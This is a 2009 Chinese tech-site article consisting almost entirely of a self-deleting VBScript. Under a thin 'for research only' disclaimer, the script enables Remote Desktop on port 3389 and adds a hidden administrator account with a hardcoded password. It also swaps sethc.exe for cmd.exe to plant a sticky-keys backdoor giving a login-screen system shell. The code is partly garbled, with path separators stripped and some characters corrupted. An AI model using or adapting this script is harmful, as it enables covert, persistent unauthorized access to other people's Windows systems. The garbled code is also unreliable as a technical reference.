可自删除开启3389创建用户粘滞键后门的vbs

ZDNet软件频道 时间:2009-11-06 作者: | 赛迪网 我要评论()
本文关键词:黑客 后门 Windows
  开启3389创建用户粘滞键后门,作研究使用,请勿违法

  开启3389创建用户粘滞键后门,作研究使用,请勿违法

  on error resume next

  const HKEY_LOCAL_MACHINE = &H80000002

  strComputer = "."

  Set StdOut = WScript.StdOut

  Set oReg=GetObject("winmgmts:!" &_

  strComputer & " ootdefault:StdRegProv")

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"

  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp"

  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"

  strValueName = "fDenyTSConnections"

  dwValue = 0

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp"

  strValueName = "PortNumber"

  dwValue = 3389

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"

  strValueName = "PortNumber"

  dwValue = 3389

  oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

  on error resume next

  dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)"wscript.echo of.ADsPath

  On Error Resume Next

  Dim obj, success

  Set obj = CreateObject("WScript.Shell")

  success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)

  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)


百度大联盟认证黄金会员Copyright© 1997- CNET Networks 版权所有。 ZDNet 是CNET Networks公司注册服务商标。
中华人民共和国电信与信息服务业务经营许可证编号:京ICP证010391号 京ICP备09041801号-159
京公网安备:1101082134